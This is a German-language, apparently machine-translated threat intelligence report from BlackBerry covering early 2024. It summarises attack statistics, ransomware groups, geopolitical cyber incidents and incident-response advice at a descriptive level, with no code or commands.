Umsetzbare Intelligenz, die wichtig ist
Dieser Bericht ( BlackBerry ) bietet einen umfassenden Überblick über die globale Bedrohungslandschaft für den Zeitraum von Januar bis März 2024. Zu den Highlights des Berichts gehören:
Wir beobachteten über 630.000 bösartige Hashes, was einem Anstieg von über 40 Prozent pro Minute gegenüber dem vorherigen Berichtszeitraum entspricht.
Mehr erfahren imAbschnitt Total Attacks This Period.
60 Prozent aller Angriffe richteten sich gegen kritische Infrastrukturen. Davon waren 40 Prozent auf den Finanzsektor gerichtet.
Die Einzelheiten finden Sie in der Kritische Infrastruktur Abschnitt.
56 Prozent der CVEs wurden mit 7,0 oder höher eingestuft (wobei 10 die höchste Einstufung ist). CVEs wurden schnell zur Waffe in allen Formen von Malware - insbesondere Ransomware und Infostealern.
Weitere Informationen finden Sie imAbschnitt Allgemeine Schwachstellen und Gefährdungen.
Neuer Abschnitt über Ransomware: Wir haben einen neuen Abschnitt über die wichtigsten Ransomware-Gruppen auf der ganzen Welt und die aktivste Ransomware in diesem Berichtszeitraum aufgenommen.
Weitere Informationen finden Sie im Abschnitt Who's Who in Ransomware.
Die BlackBerry® Global Threat Intelligence Reports werden alle drei Monate veröffentlicht. Diese häufigen Aktualisierungen ermöglichen es CISOs und anderen wichtigen Entscheidungsträgern, sich über die neuesten Cybersecurity-Bedrohungen und -Herausforderungen in ihren Branchen und geografischen Regionen zu informieren.
Der Bericht ist das Ergebnis der Untersuchungen, Analysen und Schlussfolgerungen unseres Cyber Threat Intelligence (CTI)-Teams, unseres Incident Response (IR)-Teams und der Sicherheitsspezialisten unserer Abteilung CylanceMDR™. Scrollen Sie weiter, um mehr zu erfahren, die PDF-Datei herunterzuladen oder den Kurzbericht zu lesen.
Angriffe insgesamt in diesem Zeitraum
Wie Sie in diesem Bericht feststellen werden, korreliert die Gesamtzahl der Angriffe nicht notwendigerweise mit der Zahl der einzigartigen Hashes (neue Malware). Wie die Abbildungen 2 bis 6 in den nächsten beiden Abschnitten veranschaulichen, wird nicht bei jedem Angriff einzigartige Malware verwendet. Dies hängt von der Motivation des Angreifers, der Komplexität des Angriffs und dem Ziel ab - z. B. Informationsdiebstahl oder Finanzdiebstahl.
BlackBerry Cybersecurity-Lösungen haben über 3.100.000 Cyberangriffe gestoppt: Das entspricht über 37.000 gestoppten Cyberangriffen pro Tag.
Angriffe nach Land
Angriffe gestoppt
Die folgende Abbildung 2 zeigt die fünf Länder, in denen die Cybersecurity-Lösungen von BlackBerry die meisten Cyberangriffe verhindert haben. Organisationen, die BlackBerry Lösungen in den Vereinigten Staaten nutzen, wurden in diesem Berichtszeitraum am häufigsten angegriffen. Im asiatisch-pazifischen Raum (APAC) waren Japan, Südkorea und Australien ebenfalls von einer hohen Anzahl von Angriffen betroffen, was ihnen einen Platz unter den ersten fünf Ländern einbrachte. In Lateinamerika (LATAM) wurden Kunden in Honduras stark angegriffen, was diesem Land den fünften Platz auf unserer Liste einbrachte.
Einzigartige Malware
In diesem Berichtszeitraum beobachtete BlackBerry einen Anstieg der neuartigen Hashes (einzigartige Malware) um mehr als 40 Prozent pro Minute im Vergleich zum Zeitraum von September bis Dezember 2023 (Abbildung 1). Abbildung 2 zeigt die fünf Länder, in denen die Cybersecurity-Lösungen von BlackBerry die höchste Anzahl einzigartiger Malware-Hashes verzeichneten, wobei die Vereinigten Staaten die größte Anzahl erhielten. Südkorea, Japan und Australien im asiatisch-pazifischen Raum behielten ihre Platzierungen aus dem letzten Dreimonatszeitraum bei, während Brasilien neu in die Liste aufgenommen wurde.
Wie wir in den nächsten Abschnitten sehen werden, können andere Angreifer die physische Infrastruktur, z. B. eines öffentlichen Versorgungsunternehmens, schädigen wollen, indem sie eine Schwachstelle in den Kontrollsystemen ausnutzen oder ein Gerät im Netzwerk infizieren
Angriffe nach Branchen
Wie in unserem letzten Bericht haben wir mehrere Schlüsselindustrien in zwei übergeordneten Abschnitten zusammengefasst: Kritische Infrastrukturen und Wirtschaftsunternehmen.
Kritische Infrastrukturen werden von der Agentur für Cybersicherheit und Infrastruktursicherheit (CISA) definiert und umfassen 16 Sektoren, darunter Gesundheitswesen, Regierung, Energie, Landwirtschaft, Finanzen und Verteidigung.
Die zunehmende Digitalisierung dieser Sektoren bedeutet, dass ihre Vermögenswerte anfälliger für Cyberkriminelle sind. Bedrohungsakteure nutzen kritische Systeme aktiv über Schwachstellen wie Systemfehlkonfigurationen und Social-Engineering-Kampagnen gegen Mitarbeiter aus.
Zu den Wirtschaftsunternehmen gehören die verarbeitende Industrie, Investitionsgüter, gewerbliche und freiberufliche Dienstleistungen sowie der Einzelhandel. Unternehmen sind immer ein verlockendes Ziel für Cyberangriffe, und die zunehmende Nutzung von vernetzten Geräten und Cloud Computing hat es einfacher gemacht, in ihre Systeme einzudringen. Die Angreifer sind auch immer raffinierter geworden und nutzen häufig Social Engineering, um an Zugangsdaten zu gelangen und Malware zu verbreiten.
Cyber Story Highlight: Internationale Banken
Mexikanische Banken und Kryptowährungsplattformen im Visier von AllaKore RAT
Im Januar deckten die Cyberbedrohungsanalysten von BlackBerry eine lang laufende, finanziell motivierte Kampagne auf, die mit dem AllaKore RAT, einem modifizierten Open-Source-Tool für den Fernzugriff, auf mexikanische Banken und Kryptowährungshandelsplattformen abzielte. Die Bedrohungsakteure benutzten Köder, die das mexikanische Sozialversicherungsinstitut (IMSS) und legitime Dokumente imitierten, um die Benutzer während des Installationsprozesses abzulenken und ihnen zu ermöglichen, Bankdaten und Authentifizierungsinformationen zu stehlen. Diese Kampagne läuft seit 2021 und konzentriert sich auf große mexikanische Unternehmen mit einem Umsatz von mehr als 100 Millionen Dollar. BlackBerry Die Ergebnisse der Studie legen nahe, dass der Bedrohungsakteur wahrscheinlich in Lateinamerika ansässig ist, da die IPs von Mexico Starlink und die spanischsprachigen Anweisungen in der RAT-Nutzlast verwendet werden. Lesen Sie den vollständigen Artikel in unserem Blog, um mehr zu erfahren.
Bedrohungen für kritische Infrastrukturen
Ausgehend von unseren internen Telemetriedaten waren von den branchenspezifischen Cyberangriffen auf die Cybersecurity-Lösungen von BlackBerry 60 Prozent gegen kritische Infrastrukturen gerichtet. Darüber hinaus zielten 32 Prozent der einzelnen Malware-Hashes auf Mieter kritischer Infrastrukturen ab.
CylanceENDPOINT™ und andere Cybersecurity-Lösungen von BlackBerry haben mehr als 1,1 Millionen Angriffe auf kritische Industriesektoren abgewehrt, darunter das Finanzwesen, das Gesundheitswesen, Behörden und Versorgungsunternehmen. Fast die Hälfte dieser 1,1 Millionen Angriffe betraf den Finanzsektor. Darüber hinaus waren Organisationen im Regierungs- und öffentlichen Sektor von der größten Vielfalt an Angriffen betroffen, wobei über 36 Prozent der eindeutigen Hashes auf diesen Sektor abzielten.
BlackBerry Telemetrie wurden mehrere verbreitete Malware-Familien erfasst, die auf kritische Infrastrukturen rund um den Globus abzielen. So wurde beispielsweise der berüchtigte Infostealer LummaStealer beobachtet, der speziell auf die Lebensmittel- und Agrarindustrie in Lateinamerika und den Energiesektor in der APAC-Region abzielt. Zu den bemerkenswerten Bedrohungen, die in diesem Berichtszeitraum beobachtet wurden, gehören:
- 8Base Ransomware: Ransomware-Einsatz | Gesundheitssektor
- Amadey (Amadey Bot): Multifunktionales Botnetz | Regierungseinrichtungen
- Buhti: Ransomware-Einsatz | Gewerbeimmobilien
- LummaStealer (LummaC2): C-basierter Infostealer | Lebensmittel- und Agrarsektor (LATAM) und Energiesektor (APAC)
- PrivateLoader: Downloader-Familie | Energiewirtschaft
- Remcos (RemcosRAT): Kommerzielles Fernzugriffstool (RAT) | Lebensmittel- und Agrarsektor
- Vidar (VidarStealer): Commodity infostealer | Verschiedene Sektoren:
- Der Energiesektor in den APAC-Ländern
- Der IT-Sektor in den LATAM-Ländern
- Der Finanzdienstleistungssektor in Nordamerika
- Der Sektor der staatlichen Einrichtungen in Europa, dem Nahen Osten und Afrika (EMEA)
Einzelheiten zu diesen Bedrohungen für kritische Infrastrukturen finden Sie im Anhang.
Externe Bedrohungen für kritische Infrastrukturen
Externe Bedrohungen sind Cyberangriffe, die außerhalb der internen Telemetrie von BlackBerryaufgezeichnet werden. Im letzten Berichtszeitraum gab es in der globalen Bedrohungslandschaft eine Reihe bemerkenswerter Angriffe auf kritische Infrastrukturen.
Der Einbruch beim Idaho National Laboratory (INL), einer Forschungseinrichtung des US-Energieministeriums (DOE), der Ende 2023 stattfand, hat weitere Auswirkungen. Angreifer drangen in die Cloud-basierte Personalverwaltungsplattform Oracle HCM des Labors ein und erbeuteten die persönlichen Daten von über 45.000 Personen. Die Hacktivistengruppe SiegedSec bekannte sich in den darauffolgenden Wochen zu dem Angriff und veröffentlichte einen Teil der gestohlenen Daten in einem Online-Leak-Forum. Abbildung 7 zeigt eine Zeitleiste mit bemerkenswerten Bedrohungen gegen kritische Infrastrukturen, die sich im Berichtszeitraum ereigneten.
Cyber Story Highlight: Infrastruktur, VPNs und Zero Trust
Dringlichkeitsrichtlinie zeigt, dass es an der Zeit sein könnte, VPNs zu ersetzen
Die Kernfunktionalität virtueller privater Netzwerke (VPNs) ist seit ihrer Einführung im Jahr 1996 weitgehend unverändert geblieben, aber die jüngsten Sicherheitsverletzungen und Regierungsrichtlinien legen nahe, dass es an der Zeit sein könnte, ihre Verwendung zu überdenken.
Ein zentrales Problem ist das "Trust but Verify"-Modell von VPNs, das Nutzern innerhalb des Netzwerks Vertrauen entgegenbringt und sie damit anfällig für Cyberangriffe macht. Um auf dieses Risiko hinzuweisen, hat die Cybersecurity and Infrastructure Security Agency (CISA) kürzlich Notfallrichtlinien herausgegeben, die sich mit kritischen VPN-Schwachstellen befassen und zur schnellen Abschaltung gefährdeter Produkte auffordern. Lesen Sie die ganze Geschichte in unserem Blog.
Bedrohungen für kommerzielle Unternehmen
Genauso wie Branchen von Bedrohungen der Cybersicherheit betroffen sind, haben auch einzelne Unternehmen mit Cyberangriffen zu kämpfen, zumal sie sich in den Bereichen Finanzen, Kommunikation, Vertrieb, Beschaffung und anderen Geschäftsabläufen zunehmend auf digitale Infrastrukturen stützen. Von Start-ups bis hin zu multinationalen Konzernen ist alles anfällig für Cyberbedrohungen, insbesondere Ransomware.
Im letzten Berichtszeitraum blockierten die Cybersecurity-Lösungen von BlackBerry 700.000 Angriffe auf Branchen im Unternehmenssektor.
Ausgehend von unserer internen Telemetrie verzeichneten die Handelsunternehmen im Vergleich zum vorangegangenen Berichtszeitraum einen Anstieg:
- die Zahl der Angriffe, denen sie ausgesetzt waren, stieg um zwei Prozent.
- einen 10-prozentigen Anstieg der Anzahl der gefundenen Hashes.
Kommerzielle Unternehmen sind mit Bedrohungen durch Infostealer konfrontiert, die über Malware-as-a-Service (MaaS)-Operationen verkauft werden. Oft wird bei diesen Bedrohungen zusätzliche Malware auf dem Gerät des Opfers installiert. Sie entwickeln sich in einem Cyber-Wettrüsten weiter, um Sicherheitsprodukte und herkömmliche Antiviren-Software (AV) zu umgehen. Zu der in der Telemetrie von BlackBerry festgestellten weit verbreiteten Malware gehören:
- RedLine (RedLine Stealer): Infostealer
- SmokeLoader: Weit verbreitete und vielseitige Malware
- PrivateLoader: Vermittler von Malware
- RaccoonStealer: MaaS Infostealer
- LummaStealer (LummaC2): Malware-Infostealer
Einzelheiten zu diesen Bedrohungen für Wirtschaftsunternehmen finden Sie im Anhang.
Externe Bedrohungen für Wirtschaftsunternehmen
Ransomware ist eine weit verbreitete Geißel für Organisationen aller Größen und Geschäftsausrichtungen. Zu den jüngsten Beispielen für Ransomware-Angriffe gehören:
- Die VF Corporation - ein US-amerikanischer Hersteller bekannter Sportbekleidungsmarken wie Timberland, The North Face und Vans - wurde im Dezember 2023 Opfer eines Ransomware-Angriffs durch die ALPHV-Ransomware-Bande. Die Angreifer stahlen die Daten von über 35 Millionen Kunden, was zu Verzögerungen bei der Auftragsabwicklung und anderen Störungen während der wichtigen Weihnachtszeit führte.
- Coop Värmland, eine schwedische Supermarktkette, wurde durch einen Ransomware-Angriff der Cactus-Ransomware-Bande in ihrer geschäftigen Urlaubszeit gestört.
- Ein bekannter deutscher Hersteller, ThyssenKrupp, erlitt im Februar 2024 einen Einbruch in seiner Automobilsparte. Das Unternehmen erklärte später, dass es sich um einen fehlgeschlagenen Ransomware-Angriff handelte.
- Im März griff die Ransomware-Gruppe Stormous die belgische Brauerei Duvel Moortgat an, einen Hersteller von mehr als 20 Biermarken, und stahl 88 GB an Daten.
Das Who is Who der Ransomware-Branche
Wie die oben genannten Ereignisse zeigen, war Ransomware eine weit verbreitete Bedrohung im BlackBerry Global Threat Intelligence Report. Für diesen Bericht haben wir einen Abschnitt speziell über Ransomware-Gruppen eingeführt, die in diesem Berichtszeitraum aktiv waren.
Ransomware ist ein universelles Werkzeug, das von Cyberkriminellen und organisierten Syndikaten gleichermaßen eingesetzt wird und Opfer in allen Branchen rund um den Globus ins Visier nimmt. Die meisten dieser Gruppen sind finanziell motiviert. Sie passen schnell neue Taktiken und Techniken an, um herkömmliche Cybersicherheitsmaßnahmen zu umgehen, und nutzen rasch neue Sicherheitslücken aus.
Ransomware zielt zunehmend auf Organisationen des Gesundheitswesens ab, ein besorgniserregender Trend. Das Gesundheitswesen ist ein profitabler Sektor für Ransomware-Gruppen aufgrund der zunehmenden Digitalisierung von Gesundheitsakten und der schwerwiegenden Folgen, die auftreten können, wenn diese Dienste unterbrochen werden. Diese aggressiven Syndikate, die in diesem Berichtszeitraum weltweit bemerkenswerte Angriffe durchgeführt haben, können Leben gefährden und den Zugang von Mitarbeitern des Gesundheitswesens zu den wichtigen personenbezogenen Daten der Patienten einschränken oder unterbinden.
Angriffe auf das Gesundheitswesen können schwerwiegende Auswirkungen haben, indem sie Krankenhäuser, Kliniken, Apotheken und Arzneimittelausgabestellen lahmlegen, Patienten daran hindern, lebenswichtige Medikamente zu erhalten, die Umleitung von Krankenwagen veranlassen und die Planung medizinischer Verfahren stören. Zu den sekundären Auswirkungen gehören Datenverluste und der Verkauf sensibler Patienteninformationen im Dark Web. Aus diesem Grund gehen wir davon aus, dass das Gesundheitswesen auch im Jahr 2024 weiterhin stark ins Visier der Öffentlichkeit und der Privatwirtschaft geraten wird.
Die wichtigsten Ransomware-Akteure in diesem Berichtszeitraum
Nachfolgend finden Sie die wichtigsten Ransomware-Bedrohungsgruppen aus aller Welt, die im Berichtszeitraum aktiv waren:
Hunters International
Hunters International, ein Ransomware-as-a-Service (RaaS) Verbrechersyndikat, das seit Ende 2023 aktiv ist, wurde Anfang 2024 bekannt. Die Gruppe ist möglicherweise eine Abspaltung der Ransomware-Gruppe Hive, die Anfang 2023 von den Strafverfolgungsbehörden zerschlagen wurde. Diese Gruppe wendet ein doppeltes Erpressungsschema an, bei dem zunächst die Daten des Opfers verschlüsselt werden, um Lösegeld zu erpressen, und anschließend mehr Geld gefordert wird, indem damit gedroht wird, die gestohlenen Daten öffentlich zu veröffentlichen. Hunters International ist derzeit rund um den Globus aktiv.
8Base
Die Ransomware-Gruppe 8Base wurde erstmals im Jahr 2022 beobachtet und erlangte Ende 2023 große Bekanntheit. Diese produktive Gruppe verwendet eine Vielzahl von Taktiken, Techniken und Verfahren (TTPs) und kann sehr opportunistisch sein. Die Gruppe nutzt oft schnell neu entdeckte Schwachstellen aus und setzt verschiedene Ransomware ein, darunter Phobos.
LockBit
LockBit, eine in Russland ansässige Ransomware-Gruppe, ist auf die Bereitstellung von RaaS durch ihre gleichnamige Malware spezialisiert. Die im Jahr 2020 entdeckte LockBit-Ransomware hat sich zu einer der aggressivsten Ransomware-Gruppen entwickelt. Zu den Aspekten gehören:
- Benutzerdefinierte Tools, um die Daten der Opfer vor der Verschlüsselung zu exfiltrieren und über eine undichte Stelle im Dark Web zu hosten.
- Zielt in erster Linie auf Opfer in Nordamerika und in zweiter Linie in Lateinamerika ab.
- Setzt eine doppelte Erpressungsstrategie ein.
Im Februar 2024 wurde der Betrieb von LockBit durch die Operation Cronos, eine internationale Strafverfolgungsmaßnahme, unterbrochen. LockBit scheint sich seitdem jedoch erholt zu haben und bleibt ein wichtiger Akteur im Bereich Ransomware.
Play
Play wurde erstmals im Jahr 2022 beobachtet und ist eine Ransomware-Gruppe, die gestohlene Daten auf TOR-basierten Seiten hostet, die eine anonyme Kommunikation ermöglichen, und damit droht, dass die Daten geleakt werden, wenn das Lösegeld nicht gezahlt wird. Play zielt häufig auf kleine und mittlere Unternehmen (KMU) ab, hauptsächlich in Nordamerika, aber auch in der EMEA-Region während des Berichtszeitraums. Die Gruppe nutzt vor allem Standard-Tools wie Cobalt Strike, Empire und Mimikatz für die Entdeckung und für TTPs für seitliche Bewegungen. Die Gruppe nutzte auch Grixba, ein kundenspezifisches Aufklärungs- und Infostealing-Tool, das vor der Ausführung von Ransomware eingesetzt wird.
BianLian
BianLian ist eine auf GoLang basierende Ransomware, die seit 2022 im Umlauf ist. Die zugehörige Gruppe war im Berichtszeitraum aktiv und hatte es vor allem auf Opfer in Nordamerika abgesehen. Wie viele Ransomware-Gruppen nutzt auch BianLian kürzlich bekannt gewordene Schwachstellen aus und zielt oft auf kleinere Unternehmen in verschiedenen Branchen ab. BianLian nutzt verschiedene Standard-Tools wie PingCastle, Advance Port Scanner und SharpShares, um auf einem Zielsystem Fuß zu fassen, bevor es sensible Daten ausspäht und Ransomware ausführt. Diese gestohlenen Daten werden dann als Erpressungstaktik eingesetzt, bis das Lösegeld gezahlt wird.
ALPHV
ALPHV, oft auch als BlackCat oder Noberus bezeichnet, ist eine RaaS-Operation, die es seit Ende 2021 gibt. Die Bedrohungsgruppe, die hinter ALPHV steht, ist hoch entwickelt und nutzt die Programmiersprache Rust, um Windows-, Linux- und VMWare-basierte Betriebssysteme anzugreifen. ALPHV hat es in der Regel auf nordamerikanische Opfer abgesehen.
Ransomware-Gruppen ... passen schnell neue Taktiken und Techniken an, um herkömmliche Cybersicherheitsmaßnahmen zu umgehen, und nutzen neue Sicherheitslücken schnell aus.
Cyber Story Highlight: Ransomware und Gesundheitswesen
12 Tage ohne Einnahmen: Ransomware-Fallout setzt sich im Gesundheitswesen fort
Im März wurde der Gesundheitssektor von einem "beispiellosen" Ransomware-Angriff heimgesucht, der nach Angaben der American Hospital Association (AHA) den Betrieb von Krankenhäusern und Apotheken unterbrochen hat. Der Angriff auf Change Healthcare, das jährlich 15 Milliarden Transaktionen im Gesundheitswesen abwickelt, hatte schwerwiegende Auswirkungen auf die Patientenversorgung, z. B. auf die klinische Entscheidungshilfe und den Apothekenbetrieb. Diese Unterbrechung führte zu einem 12-tägigen Umsatzstillstand für die betroffenen Arztpraxen und ließ die Patienten in Schwierigkeiten geraten, an lebenswichtige Rezepte zu gelangen. Das Büro für Bürgerrechte des US-Gesundheitsministeriums untersucht den Vorfall, und die neuesten Daten zeigen, dass die Zahl der Cyber-Bedrohungen erheblich gestiegen ist: In den letzten fünf Jahren gab es einen Anstieg von 256 % bei großen Hackerangriffen. Der Vorfall unterstreicht den dringenden Bedarf an verbesserten Cybersicherheitsmaßnahmen im Gesundheitswesen. Eine ausführliche Untersuchung dieses dringenden Themas finden Sie in unserem Blog.
Geopolitische Analyse und Kommentare
Geopolitische Konflikte sind zunehmend die Ursache von Cyberangriffen. Digitale Technologien können mächtige Werkzeuge für das Gute sein, aber sie können auch von staatlichen und nichtstaatlichen Akteuren missbraucht werden. In den ersten drei Monaten des Jahres 2024 wurden Gesetzgeber in ganz Europa, Nordamerika und im asiatisch-pazifischen Raum Opfer von gezielten Spionagekampagnen. Bedrohungsakteure drangen in die IT-Systeme mehrerer Regierungsbehörden ein, kompromittierten militärische Systeme und störten kritische Infrastrukturen auf der ganzen Welt.
Die Motive für diese Eingriffe sind zwar oft komplex und undurchsichtig, aber die bedeutendsten Vorfälle der letzten Zeit betrafen wichtige geopolitische Konflikte wie die russische Invasion in der Ukraine, die zunehmende Aggression zwischen Israel und dem Iran und die anhaltenden Spannungen im Südchinesischen Meer und im indopazifischen Raum.
In der Ukraine geht die Cyberdimension des Krieges weiter. Entgegen den internationalen Normen für rechtmäßiges Verhalten im Cyberspace wird bei den gegen die Ukraine gerichteten Angriffen weiterhin nicht zwischen ziviler und militärischer Infrastruktur unterschieden. Im Januar zapften russische Agenten Webcams von Wohnhäusern in Kiew an, um angeblich Informationen über die Luftabwehrsysteme der Stadt zu sammeln, bevor sie einen Raketenangriff auf die Stadt starteten. Berichten zufolge manipulierten die Angreifer die Kameraperspektiven, um Informationen über nahegelegene kritische Infrastrukturen zu sammeln und so den Raketenangriff zu präzisieren.
Russische Cyberbedrohungsakteure wurden auch mit einem Angriff auf den größten ukrainischen Mobilfunkanbieter Kyivstar in Verbindung gebracht, bei dem wichtige Infrastrukturen zerstört und der Zugang zu 24 Millionen Kunden in der Ukraine unterbrochen wurde. Dieser Angriff erfolgte nur wenige Stunden vor dem Treffen von Präsident Biden mit Präsident Zelenskyy in Washington D.C. Auch Abgeordnete in der EU entdeckten, dass ihre Telefone mit Spionageprogrammen infiziert waren. Viele dieser Abgeordneten waren Mitglieder des Unterausschusses für Sicherheit und Verteidigung des Europäischen Parlaments, der für Empfehlungen zur EU-Unterstützung für die Ukraine zuständig ist. Im März fingen russische Angreifer auch Gespräche zwischen deutschen Militärbeamten über eine mögliche militärische Unterstützung der Ukraine ab, was die Notwendigkeit unterstreicht, die Kommunikation vor zunehmenden Spionageversuchen zu schützen.
Mit der Eskalation der militärischen Aktivitäten zwischen Iran und Israel sind auch die Cyberangriffe auf israelische Regierungsseiten gestiegen. Als Vergeltung legten israelische Bedrohungsakteure 70 Prozent der Tankstellen in ganz Iran lahm. Unterdessen starteten die USA einen Cyberangriff auf ein iranisches Militärspionageschiff im Roten Meer, das Informationen an Houthi-Rebellen weitergab.
In der indo-pazifischen Region häufen sich die Cyberangriffe und Spionagekampagnen, die chinesischen Gruppen zugeschrieben werden. Das U.S. Department of Homeland Security's Cyber Safety Review Board veröffentlichte einen umfangreichen Bericht über den Microsoft Online Exchange Incident vom Sommer 2023 und dokumentierte detailliert, wie Angreifer mit chinesischem Hintergrund Quellcode von Microsoft stahlen. Die Bedrohungsgruppe Storm-0558 kompromittierte Mitarbeiter und Beamte des US-Außenministeriums, des US-Handelsministeriums, des US-Repräsentantenhauses und mehrerer britischer Regierungsstellen. Dem Bericht zufolge gelang es den Angreifern, rund 60.000 E-Mails allein aus dem Außenministerium herunterzuladen.
Dies war kein Einzelfall. Im März 2024 deckten das US-Justizministerium und das FBI auf, dass chinesische Angreifer es auf mehrere britische, EU-, US-amerikanische und kanadische Mitglieder der Interparlamentarischen Allianz für China abgesehen hatten.
Wie bereits erwähnt, haben die Angriffe auf kritische Infrastrukturen zugenommen, insbesondere im Finanz- und Gesundheitssektor. In den ersten drei Monaten des Jahres 2024 führte eine massive Datenpanne bei einer französischen Krankenkasse zum Verlust sensibler persönlicher Daten. In Kanada schaltete das Financial Transactions and Reports Analysis Center (FINTRAC) seine Systeme nach einem Cybervorfall ab. Als Reaktion darauf stellte die kanadische Regierung 27 Millionen CAN$ zur Verfügung, um die Cyber-Resilienz von FINTRAC zu verbessern und Datensicherheitsvorkehrungen zu schaffen.
Angesichts der zunehmenden Cyberspionage und Cyberangriffe investieren Regierungen auf der ganzen Welt in die Verbesserung der Cybersicherheit. Kanada kündigte kürzlich Investitionen in historischer Höhe in seine Cyberabwehr an, und das Vereinigte Königreich erhöhte seine Verteidigungsausgaben auf 2,5 Prozent des BIP. Die Cybersicherheit bleibt eines der größten Risiken für Regierungen und Akteure des privaten Sektors gleichermaßen, und dieser Trend wird sich wahrscheinlich fortsetzen, solange die geopolitischen Spannungen weiter zunehmen.
Beobachtungen zur Reaktion auf Vorfälle
Beobachtungen des BlackBerry Incident Response Teams
Dies ist eine Zusammenfassung der Arten von IR-Einsätzen, auf die das Team von BlackBerry reagiert hat, sowie der Sicherheitsmaßnahmen, die Unternehmen ergreifen können, um solche Verstöße zu verhindern.
- Eindringen in das Netzwerk: Vorfälle, bei denen der ursprüngliche Infektionsvektor ein anfälliges, dem Internet zugewandtes System war, z. B. ein Webserver oder eine VPN-Anwendung (Virtual Private Network). In einigen Fällen führte der Einbruch zur Bereitstellung von Ransomware in der Umgebung des Ziels und zur Exfiltration von Daten.
- Vorbeugung: Führen Sie rechtzeitig Sicherheitsupdates für alle dem Internet ausgesetzten Systeme durch. (MITRE - External Remote Services, T1133.)
- Insider-Fehlverhalten: Ein derzeitiger und/oder ehemaliger Mitarbeiter hat ohne Genehmigung auf Unternehmensressourcen zugegriffen.
- Prävention: Einführung strenger Sicherheitskontrollen für die Authentifizierung auf allen Systemen. Implementieren Sie formelle Verfahren zur Entlassung von Mitarbeitern aus dem Unternehmen. (MITRE - Gültige Konten: Cloud-Konten, T1078.004.)
- Ransomware: Zehn Prozent aller Vorfälle, auf die reagiert wurde, waren auf Ransomware zurückzuführen.
- Prävention: Patchen Sie Internet-Dienste wie E-Mail, VPNs und Webserver rechtzeitig. Dies kann einen Bedrohungsakteur daran hindern, auf ein Unternehmensnetzwerk über ein anfälliges Gerät oder System zuzugreifen und weitere Maßnahmen zu ergreifen, z. B. die Verbreitung von Ransomware. (MITRE - Externe Remote-Dienste, T1133.)
- Vorbeugung: Stellen Sie sicher, dass das Unternehmen über zwei Kopien aller wichtigen Daten verfügt, die in zwei verschiedenen Medienformaten von der ursprünglichen Datenquelle gespeichert sind, wobei mindestens eine Kopie außerhalb des Unternehmens liegen muss.
Das Erkennen, Eindämmen und Wiederherstellen eines Cyber-Sicherheitsvorfalls erfordert eine schnelle Erkennung und Reaktion, um den Schaden zu begrenzen. Es ist unerlässlich, dass Unternehmen über einen gut dokumentierten Plan für die Reaktion auf einen Vorfall sowie über geschultes Personal und Ressourcen verfügen, die bereit sind, bei den ersten Anzeichen einer potenziellen Sicherheitsverletzung sofort zu handeln. Auf diese Weise wird sichergestellt, dass Sicherheitsteams Probleme so früh wie möglich erkennen, Bedrohungen schnell eindämmen und beseitigen sowie die Auswirkungen auf den Ruf des Unternehmens und der Marke, finanzielle Verluste und rechtliche Risiken für das Unternehmen mindern können.
Bedrohungsakteure und Werkzeuge
Bedrohungsakteure
In den ersten drei Monaten des Jahres 2024 haben Dutzende von Bedrohungsgruppen Cyberangriffe durchgeführt. Wir haben die wirkungsvollsten Angriffe hier hervorgehoben.
LockBit
Im Februar haben die nationale Wettbewerbsbehörde (NCA), das FBI und Europol im Rahmen einer koordinierten globalen Aktion namens "Operation Cronosmit Strafverfolgungsbehörden in 10 Ländern zusammengearbeitet, um die Kontrolle über die Infrastruktur und die Leak-Site der LockBit-Gruppe zu übernehmen, Informationen von deren Servern zu sammeln, Verhaftungen vorzunehmen und Sanktionen zu verhängen.
Weniger als eine Woche später gruppierte sich die Ransomware-Gruppe jedoch neu und nahm ihre Angriffe wieder auf, wobei sie aktualisierte Verschlüsselungsprogramme und Erpresserbriefe verwendete, die die Opfer nach der Unterbrechung durch die Strafverfolgungsbehörden an neue Server verwiesen.
LockBit hat sich zu Cyberangriffen auf verschiedene Netzwerke bekannt, darunter auch das Krankenhausnetzwerk von Capital Health. In beiden Fällen drohten sie mit der Herausgabe vertraulicher Daten, falls nicht umgehend Lösegeld gezahlt würde.
Rhysida
APT29
Die CISA warnte kürzlich, dass APT29 seine Angriffe auf weitere Branchen und mehr lokale Behörden ausgeweitet hat. Die Bedrohungsgruppe, die dafür bekannt ist, dass sie eine breite Palette an benutzerdefinierter Malware einsetzt, hat in letzter Zeit auch Cloud-Dienste ins Visier genommen, indem sie kompromittierte Dienstkonten oder gestohlene Authentifizierungs-Tokens verwendet hat.
In diesem Berichtszeitraum wurde APT29 dabei beobachtet, wie sie sich nach einem Passwort-Spray-Angriff Zugang zu einem Microsoft-Testmieterkonto verschaffte und anschließend bösartige OAuth-Anwendungen erstellte, um auf E-Mail-Konten von Unternehmen zuzugreifen. Außerdem wurden deutsche politische Parteien mit WINELOADER angegriffen, einer Backdoor, die erstmals im Januar 2024 beobachtet wurde.
Akira
Akira ist dafür bekannt, dass er Hilfsmittel wie diese verwendet:
- AdFind für die Abfrage von Active Directory.
- Mimikatz und LaZagne für den Zugang zu den Anmeldeinformationen.
- Ngrok zum Tunneln in Netzwerke hinter Firewalls oder anderen Sicherheitsmaßnahmen.
- AnyDesk für den Fernzugriff.
- Erweiterter IP-Scanner zum Auffinden von Geräten in einem Netzwerk.
Von Bedrohungsakteuren verwendete Schlüsselwerkzeuge
Mimikatz
Kobaltstreik
Ngrok
ConnectWise
Vorherrschende Bedrohungen nach Plattform: Windows
Remcos
Fernzugriff-Trojaner
Remcos, die Abkürzung für Remote Control and Surveillance, ist eine Anwendung, mit der aus der Ferne auf das Gerät eines Opfers zugegriffen werden kann.
Agent Tesla
Infostealer
Agent Tesla ist ein .NET-basierter Trojaner, der häufig als MaaS verkauft wird und in erster Linie zum Sammeln von Anmeldeinformationen verwendet wird.
RedLine
Infostealer
Die RedLine-Malware nutzt eine breite Palette von Anwendungen und Diensten, um Daten der Opfer, wie Kreditkarteninformationen, Passwörter und Cookies, unrechtmäßig zu exfiltrieren.
RisePro
Infostealer
Während in unserem letzten Bericht aktualisierte Varianten von RisePro beobachtet wurden, wurde der Infostealer in diesem Berichtszeitraum in einer neuen Kampagne gesehen, die fälschlicherweise als "geknackte Software" über GitHub-Repositories verbreitet wurde.
SmokeLoader
Hintertür
SmokeLoader ist eine modulare Malware, die dazu dient, andere Nutzlasten herunterzuladen und Informationen zu stehlen. Sie wurde ursprünglich im Jahr 2011 beobachtet, bleibt aber bis heute eine aktive Bedrohung.
Prometei
Kryptowährung Miner/Botnet
